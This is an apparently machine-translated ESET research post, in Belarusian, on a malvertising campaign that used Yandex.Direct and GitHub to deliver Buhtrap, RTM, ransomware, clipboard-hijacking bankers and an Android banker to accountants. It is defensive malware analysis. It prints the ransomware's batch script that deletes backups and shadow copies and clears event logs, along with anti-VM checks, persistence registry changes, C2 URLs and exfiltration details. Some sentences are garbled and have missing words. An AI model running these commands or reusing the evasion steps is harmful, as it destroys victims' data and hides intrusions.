Каб нацэліць кібератаку на бухгалтараў, можна выкарыстоўваць працоўныя дакументы, якія яны шукаюць у сетцы. Прыкладна так у апошнія некалькі месяцаў дзейнічала кібергрупа, якая распаўсюджвае вядомыя бэкдоры. и , а таксама шыфратары і ПА для крадзяжу криптовалют. Большасць мэт размешчаны ў Расіі. Атака рэалізавана шляхам размяшчэння шкоднаснай рэкламы ў Яндекс.Дырэкт. Патэнцыйныя ахвяры пераходзілі на сайт, дзе ім прапаноўвалася спампаваць шкоднасны файл, замаскіраваны пад шаблон дакумента. Яндэкс выдаліў шкоднасную рэкламу пасля нашага папярэджання.
Зыходны код Buhtrap у мінулым быў зліты ў сетку, таму яго можа выкарыстоўваць хто заўгодна. Мы не маем інфармацыі адносна даступнасці кода RTM.
У пасце раскажам, як атакуючыя распаўсюджвалі шкоднаснае ПЗ з дапамогай Яндэкс.Дырэкт і хосцілі яго на GitHub. Завершыць пасаду тэхнічны аналіз малвары.
Buhtrap і RTM зноў у справе
Механізм распаўсюджвання і ахвяры
Розную карысную нагрузку, якая дастаўляецца ахвярам, аб'ядноўвае агульны механізм распаўсюджвання. Усе створаныя зламыснікамі шкоднасныя файлы размяшчаліся ў двух розных рэпазітарах GitHub.
Звычайна ў рэпазітары знаходзіўся адзін пампаваны шкоднасны файл, які часта змяняўся. Паколькі на GitHub можна паглядзець гісторыю змен рэпазітара, мы бачым, якая шкоднасная праграма распаўсюджвалася ў вызначаны перыяд. Каб пераканаць ахвяру запампаваць шкоднасны файл, выкарыстоўваўся сайт blanki-shabloni24[.]ru, паказаны на малюнку вышэй.
Дызайн сайта і ўсе назовы шкоднасных файлаў вытрыманыя ў адзінай канцэпцыі - бланкі, шаблоны, дамовы, узоры і інш. Калі ўлічыць, што ў мінулым ПЗ Buhtrap і RTM ужо выкарыстоўвалася ў нападах на бухгалтараў, мы выказалі здагадку, што ў новай кампаніі стратэгія тая ж. Пытанне толькі ў тым, як ахвяра пападала на сайт атакавалых.
заражэнне
Як мінімум некалькі патэнцыйных ахвяр, якія апынуліся на гэтым сайце, былі прыцягнуты шкоднаснай рэкламай. Ніжэй прыведзены прыклад URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Як можна бачыць па спасылцы, банэр быў размешчаны на легітымным бухгалтарскім форуме bb.f2[.]kz. Важна адзначыць, што банеры з'яўляліся на розных сайтах, ва ўсіх быў адзін і той жа id кампаніі (blanki_rsya), і большасць адносілася да сэрвісаў бухгалтарскага ўліку або юрыдычнай дапамогі. З URL відаць, што патэнцыйная ахвяра выкарыстала запыт "спампаваць бланк рахунку", што падмацоўвае нашу гіпотэзу аб мэтавых нападах. Ніжэй пералічаны сайты, на якіх з'яўляліся банеры і адпаведныя пошукавыя запыты.
- спампаваць бланк рахунку - bb.f2[.]kz
- ўзор дамовы - Ipopen[.]ru
- заява скарга ўзор - 77metrov[.]ru
- бланк дамовы — blank-dogovor-kupli-prodazhi[.]ru
- судовае хадайніцтва ўзор — zen.yandex[.]ru
- узор скаргі — yurday[.]ru
- узоры бланкаў дагавораў — Regforum[.]ru
- бланк дамовы - assistentus[.]ru
- ўзор дамовы кватэры - napravah[.]com
- узоры юрыдычных дагавораў — avito[.]ru
Сайт blanki-shabloni24[.]ru, магчыма, быў настроены так, каб прайсці простую візуальную адзнаку. Як правіла, рэклама, якая вядзе на прафесійна які выглядае сайт са спасылкай на GitHub, не выглядае чымсьці відавочна дрэнным. Акрамя таго, атакавалыя выкладвалі шкоднасныя файлы ў рэпазітар толькі на абмежаваны перыяд, верагодна, на час правядзення кампаніі. Большую частку ў рэпазітары на GitHub ляжаў пусты архіў zip або чысты файл ехе. Такім чынам, атакуючыя маглі распаўсюджваць рэкламу праз Яндекс.Дырэкт на сайтах, якія з вялікай доляй верагоднасці наведваліся бухгалтарамі, якія прыходзілі па канкрэтных пошукавых запытах.
Далей разгледзім розную карысную нагрузку, якая распаўсюджвалася такім чынам.
Аналіз карыснай нагрузкі
Храналогія распаўсюджвання
Шкодная кампанія пачалася ў канцы кастрычніка 2018 года і актыўная на момант напісання пасады. Паколькі ўвесь рэпазітар быў у адкрытым доступе на GitHub, мы склалі дакладную храналогію распаўсюджвання шасці розных сямействаў шкоднаснага ПЗ (гл. малюнак ніжэй). Мы дадалі радок, які паказвае момант выяўлення спасылкі на банэр, паводле тэлеметрыі ESET, для параўнання з гісторыяй git. Як бачыце, гэта добра карэлюе з даступнасцю карыснай нагрузкі на GitHub. Разыходжанне ў канцы лютага можна растлумачыць адсутнасцю ў нас часткі гісторыі змен, паколькі рэпазітар быў выдалены з GitHub перш, чым мы змаглі яго атрымаць цалкам.
Малюнак 1. Храналогія распаўсюджвання Малвары.
Сертыфікаты для падпісвання кода
У кампаніі выкарыстоўвалася мноства сертыфікатаў. Некаторымі падпісвалі больш за адно сямейства шкоднаснага ПА, што дадаткова паказвае на прыналежнасць розных узораў да адной кампаніі. Нягледзячы на даступнасць зачыненага ключа, аператары не падпісвалі бінарныя файлы сістэматычна і выкарыстоўвалі ключ не для ўсіх узораў. У канцы лютага 2019 г. зламыснікі пачалі ствараць несапраўдныя подпісы з дапамогай сертыфіката, які належыць Google, да якога ў іх няма закрытага ключа.
Усе задзейнічаныя ў кампаніі сертыфікаты і падпісаныя імі сямействы Малвары пералічаны ў табліцы ніжэй.
Мы таксама выкарыстоўвалі гэтыя сертыфікаты подпісы кода, каб усталяваць сувязь з іншымі сямействамі шкоднаснага ПЗ. Для большасці сертыфікатаў мы не знайшлі ўзораў, якія распаўсюджваліся б не праз рэпазітар GitHub. Аднак сертыфікат TOV "MARIYA" выкарыстоўваўся для подпісу малвары, якая належыць ботнету , рэкламнага ПЗ і майнераў. Малаверагодна, што гэтае шкоднаснае ПА звязана з дадзенай кампаніяй. Хутчэй за ўсё, сертыфікат быў набыты ў даркнеце.
Win32/Filecoder.Buhtrap
Першы кампанент, які прыцягнуў нашу ўвагу - упершыню выяўлены Win32/Filecoder.Buhtrap. Гэта бінарны файл на Delphi, які часам бывае запакаваная. У асноўным ён распаўсюджваўся ў лютым-сакавіку 2019 года. Ён паводзіць сябе, як і пакладзена праграме-вымагальніку - шукае лакальныя дыскі і сеткавыя тэчкі і шыфруе выяўленыя файлы. Для кампраметацыі яму не трэба інтэрнэт-падлучэнне, паколькі ён не злучаецца з серверам для адпраўкі ключоў шыфравання. Замест гэтага ён дадае "токен" у канцы паведамлення аб выкупе, а для сувязі з аператарамі прапануе выкарыстоўваць email або Bitmessage.
Каб зашыфраваць як мага больш важных рэсурсаў, Filecoder.Buhtrap запускае струмень, прызначаны для завяршэння працы ключавога ПА, у якога могуць быць адчыненыя апрацоўшчыкі файлаў з каштоўнай інфармацыяй, што можа перашкодзіць шыфраванню. Мэтавыя працэсы - у асноўным, сістэмы кіравання базай дадзеных (СКБД). Акрамя таго, Filecoder.Buhtrap выдаляе файлы часопісаў і бэкапы, каб абцяжарыць аднаўленне дадзеных. Для гэтага выконваецца пакетны скрыпт, прыведзены ніжэй.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap выкарыстоўвае легітымны анлайн-сэрвіс IP Logger, створаны для збору інфармацыі аб наведвальніках сайтаў. Гэта прызначана для адсочвання ахвяр шыфратара, за што адказвае камандны радок:
mshta.exe "javascript:document.write('');"
Файлы для шыфравання выбіраюцца ў выпадку несупадзення па трох спісах выключэнняў. Па-першае, не шыфруюцца файлы з наступнымі пашырэннямі: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys і .bat. Па-другое, усе файлы, для якіх поўны шлях утрымоўвае радкі дырэкторыі са спісу, прыведзенага ніжэй, выключаюцца.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Па-трэцяе, пэўныя імёны файлаў таксама выключаюцца з шыфравання, сярод іх імя файла паведамлення з патрабаваннем выкупу. Спіс прадстаўлены ніжэй. Відавочна, усе гэтыя выключэнні прызначаны для захавання магчымасці запуску машыны, але з яе мінімальнай прыдатнасцю да эксплуатацыі.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Схема шыфравання файлаў
Пасля запуску шкоднаснае ПА генеруе пару 512-бітных ключоў RSA. Прыватная экспанента (d) і модуль (n) затым шыфруюцца з дапамогай цвёрда закадаванага 2048-бітнага адчыненага ключа (адчыненая экспаненты і модуль), пакуюцца zlib і кадуюцца ў base64. Які адказвае за гэта код прыведзены на малюнку 2.
Малюнак 2. Вынік дэкампіляцыі Hex-Rays працэсу генерацыі 512-бітнай пары ключоў RSA.
Ніжэй прыведзены прыклад простага тэксту са згенераваным зачыненым ключом, які ўяўляе сабой які прымацоўваецца да паведамлення аб выкупе токен.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Адкрыты ключ атакавалых прыведзены ніжэй.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Файлы зашыфраваны з дапамогай AES-128-CBC з 256-бітным ключом. Для кожнага шыфраванага файла генеруюцца новы ключ і новы вектар ініцыялізацыі. Інфармацыя аб ключы дадаецца ў канец шыфруемага файла. Разгледзім фармат зашыфраванага файла.
У зашыфраваных файлаў наступны header:
Дадзеныя зыходнага файла з даданнем магічнага значэння VEGA шыфруюцца да першых 0х5000 байтаў. Уся інфармацыя для расшыфроўкі прымацоўваецца да файла з наступнай структурай:
- Маркер памеру файла змяшчае пазнаку, якая паказвае, перавышае ці файл памер у 0x5000 байт
- AES key blob = ZlibCompress(RSAEncrypt(AES ключ + IV, адкрыты ключ згенераванай пары ключоў RSA))
- RSA key blob = ZlibCompress(RSAEncrypt(згенераваны закрыты ключ RSA, жорстка закадаваны адкрыты ключ RSA))
Win32/ClipBanker
Win32/ClipBanker - кампанент, які з перапынкамі распаўсюджваўся з канца кастрычніка да пачатку снежня 2018 года. Яго роля заключаецца ў удасканаленьні змесціва буфера абмену, ён шукае адрасы криптовалютных кашалькоў. Вызначыўшы адрас мэтавага кашалька, ClipBanker замяняе яго на адрас, як мяркуецца, які належыць аператарам. Узоры, якія мы вывучылі, не былі ні спакаваны, ні абфусцыраваны. Адзіны механізм, які выкарыстоўваецца для маскіроўкі паводзін, - шыфраванне радкоў. Адрасы кашалькоў аператараў зашыфраваны з дапамогай RC4. Мэтавыя криптовалюты - Bitcoin, Bitcoin cash, Dogecoin, Ethereum і Ripple.
У перыяд распаўсюджвання шкоднаснай праграмы на Bitcoin-кашалькі атакавалых была адпраўлена нязначная сума ў ВТС, што ставіць пад сумнеў поспех кампаніі. Акрамя таго, няма падстаў меркаваць, што гэтыя транзакцыі ўвогуле былі звязаныя з ClipBanker.
Win32/RTM
Кампанент Win32/RTM распаўсюджваўся на працягу некалькіх дзён у пачатку сакавіка 2019 года. RTM - траян-банкер, напісаны на Delphi, накіраваны на сістэмы дыстанцыйнага банкаўскага абслугоўвання. У 2017 годзе даследчыкі ESET апублікавалі гэтай праграмы, апісанне ўсё яшчэ актуальна. У студзені 2019 года Palo Alto Networks таксама выпусцілі .
Загрузнік Buhtrap
Некаторы час на GitHub быў даступны загрузнік, не падобны на папярэднія прылады Buhtrap. Ён звяртаецца да https://94.100.18[.]67/RSS.php?<some_id> для атрымання наступнага этапу і загружае яго напрамую ў памяць. Можна вылучыць два паводзіны кода другога этапу. У першым URL RSS.php перадаваў бэкдор Buhtrap напроста – гэты бэкдор вельмі падобны на той, што даступны пасля ўцечкі зыходнага кода.
Што цікава, мы бачым некалькі кампаній з бэкдорам Buhtrap, і меркавана іх вядуць розныя аператары. У дадзеным выпадку галоўнае адрозненне ў тым, што бэкдор загружаецца напрамую ў памяць і не выкарыстоўвае звычайную схему з працэсам разгортвання DLL, пра якую мы расказвалі . Акрамя таго, аператары змянілі ключ RC4, які выкарыстоўваецца для шыфравання сеткавага трафіку да C&C-серверу. У большасці кампаній, якія мы бачылі, аператары не клапаціліся аб змене гэтага ключа.
Другія, больш складаныя паводзіны - URL RSS.php перадаваў іншы загрузнік. У ім была рэалізавана нейкая абфускацыя, такая як перастраенне дынамічнай табліцы імпарту. Мэта загрузніка - звязацца з C&C-серверам [.]com/api/F27F84EDA4D13B15/2, адправіць логі і чакаць адказу. Ён апрацоўвае адказ як blob, загружае яго ў памяць і выконвае. Карысная нагрузка, якую мы бачылі пры выкананні гэтага загрузніка, была тым жа бэкдорам Buhtrap, але, магчыма, існуюць і іншыя кампаненты.
Android/Spy.Banker
Цікава, што ў рэпазітары GitHub быў знойдзены і кампанент для Android. Ён быў у асноўнай галінцы ўсяго адзін дзень - 1 лістапада 2018 года. Апроч размяшчэння на GitHub, тэлеметрыя ESET не знаходзіць сведчанняў распаўсюджвання гэтага шкоднаснага ПЗ.
Кампанент размяшчаўся як Android Application Package (APK). Ён моцна абфусцыраваны. Шкоднасныя паводзіны ўтоена ў зашыфраваным JAR, размешчаным у APK. Ён зашыфраваны па RC4 з дапамогай гэтага ключа:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Той жа ключ і алгарытм выкарыстоўваюцца для шыфравання радкоў. JAR размешчаны ў APK_ROOT + image/files. Першыя 4 байта файла ўтрымоўваюць даўжыню зашыфраванага JAR, які пачынаецца непасрэдна пасля поля даўжыні.
Расшыфраваўшы файл, мы выявілі, што гэта Anubis - раней банкер для Android. Шкоднае ПЗ мае наступныя функцыі:
- запіс з мікрафона
- стварэнне скрыншотаў
- атрыманне GPS-каардынат
- кейлоггер
- шыфраванне дадзеных прылады і патрабаванне выкупу
- рассыланне спаму
Што цікава, банкер выкарыстоўваў Twitter у якасці рэзервовага канала камунікацыі для атрымання іншага C&C-сервера. Прааналізаваны намі ўзор выкарыстоўваў акаўнт @JohnesTrader, але на момант аналізу ён ужо быў заблакаваны.
Банкер змяшчае спіс мэтавых прыкладанняў на прыладзе Android. Ён стаў даўжэй, чым спіс, атрыманы ў ходзе даследавання Sophos. У спісе мноства прыкладанняў банкаў, праграмы для анлайн-шопінгу, такія як Amazon і eBay, криптовалютные сэрвісы.
MSIL/ClipBanker.IH
Апошні кампанент, які распаўсюджваўся ў рамках гэтай кампаніі - выкананы файл. NET Windows, які з'явіўся ў сакавіку 2019 года. Большасць вывучаных версій былі спакаваны ConfuserEx v1.0.0. Як і ClipBanker, гэты кампанент выкарыстоўвае буфер абмену. Яго мэта - шырокі дыяпазон криптовалют, а таксама аферы ў Steam. Акрамя таго, ён выкарыстоўвае службу IP Logger для крадзяжу зачыненага WIF ключа Bitcoin.
Механізмы абароны
У дадатак да пераваг, якія дае ConfuserEx у выглядзе процідзеяння адладцы, дампу і ўмяшанню ў працу, у кампаненце рэалізавана магчымасць дэтэктавання антывірусных прадуктаў і віртуальных машын.
Для праверкі запуску ў віртуальнай машыне шкоднаснае ПЗ выкарыстоўвае ўбудаваны ў Windows камандны радок WMI (WMIC) для запыту інфармацыі аб BIOS, а менавіта:
wmic bios
Затым праграма парсіць выснову каманды і шукае ключавыя словы: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Для выяўлення антывірусных прадуктаў шкоднаснае ПЗ адпраўляе Windows Management Instrumentation (WMI) запыт у Windows Security Center з дапамогай ManagementObjectSearcher API як паказана ніжэй. Пасля дэкадавання з base64 выклік выглядае так:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Малюнак 3. Працэс вызначэння антывірусных прадуктаў.
Акрамя таго, шкоднаснае ПЗ правярае, ці не запушчаны ці , інструмент для абароны ад нападаў на буфер абмену, і, калі ён запушчаны, прыпыняе ўсе патокі гэтага працэсу, тым самым выключаючы абарону.
Персістэнтнасць
Вывучаная намі версія шкоднаснага ПА капіюе сябе ў %APPDATA%googleupdater.exe і выстаўляе атрыбут "схаваны" для дырэкторыі google. Затым яна змяняе значэнне SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell у рэестры Windows і дадае шлях updater.exe. Так шкоднаснае ПЗ будзе выконвацца пры кожным уваходзе карыстальніка.
Шкодныя паводзіны
Як і ClipBanker, шкоднаснае ПА адсочвае змесціва буфера абмену і шукае адрасы криптовалютных кашалькоў, а выявіўшы, замяняе яго адным з адрасоў аператара. Ніжэй паказаны спіс мэтавых адрасоў на падставе знойдзенага ў кодзе.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Для кожнага з тыпаў адрасоў ёсць адпаведны рэгулярны выраз. Значэнне STEAM_URL выкарыстоўваецца для нападу на сістэму Steam, як відаць з рэгулярнага выраза, які выкарыстоўваецца для вызначэння ў буферы:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Канал эксфільтрацыі
Апроч замены адрасоў у буферы, шкоднаснае ПА нацэлена на зачыненыя WIF-ключы Bitcoin, Bitcoin Core і Electrum Bitcoin кашалькі. Праграма выкарыстоўвае plogger.org у якасці канала эксфільтрацыі для атрымання зачыненага ключа WIF. Для гэтага аператары дадаюць дадзеныя зачыненага ключа ў загаловак User-Agent HTTP, як паказана ніжэй.
Малюнак 4. Кансоль IP Logger з выведзенымі дадзенымі.
Для эксфільтрацыі кашалькоў аператары не сталі выкарыстоўваць iplogger.org. Верагодна, яны звярнуліся да іншага метаду з прычыны абмежавання ў 255 сімвалаў у полі User-Agent, якія адлюстроўваюцца ў вэб-інтэрфейсе IP Logger. У вывучаных намі ўзорах іншы сервер для высновы дадзеных захоўваўся ў зменным асяроддзі DiscordWebHook. Што дзіўна, гэтая зменная асяроддзі нідзе ў кодзе не прызначаецца. Гэта дае падставы меркаваць, што шкоднасная праграма пакуль знаходзіцца ў стадыі распрацоўкі, і пераменная прызначаная на тэставай машыне аператара.
Ёсць і іншая прыкмета таго, што праграма ў распрацоўцы. Бінарны файл уключае два URL iplogger.org, і да абодвух накіроўваецца запыт пры эксфільтрацыі дадзеных. У запыце да аднаго з гэтых URL значэнню ў поле Referer папярэднічае "DEV /". Мы таксама знайшлі версію, якая не была запакаваная з дапамогай ConfuserEx, атрымальнік для гэтага URL названы DevFeedbackUrl. На падставе імя пераменнага асяроддзя мы лічым, што аператары плануюць выкарыстоўваць легітымны сэрвіс Discord і яго сістэму вэб-перахопу для крадзяжу криптовалютных кашалькоў.
Заключэнне
Дадзеная кампанія - прыклад выкарыстання легітымных рэкламных сэрвісаў у кібератаках. Схема накіравана на расійскія арганізацыі, але мы не здзівімся, убачыўшы такую атаку з выкарыстаннем нерасійскіх сэрвісаў. Каб пазбегнуць кампраметацыі, карыстачы павінны быць упэўненыя ў рэпутацыі крыніцы пампаванага ПЗ.
Поўны спіс індыкатараў кампраметацыі і атрыбутаў MITRE ATT&CK даступны па .
Крыніца: habr.com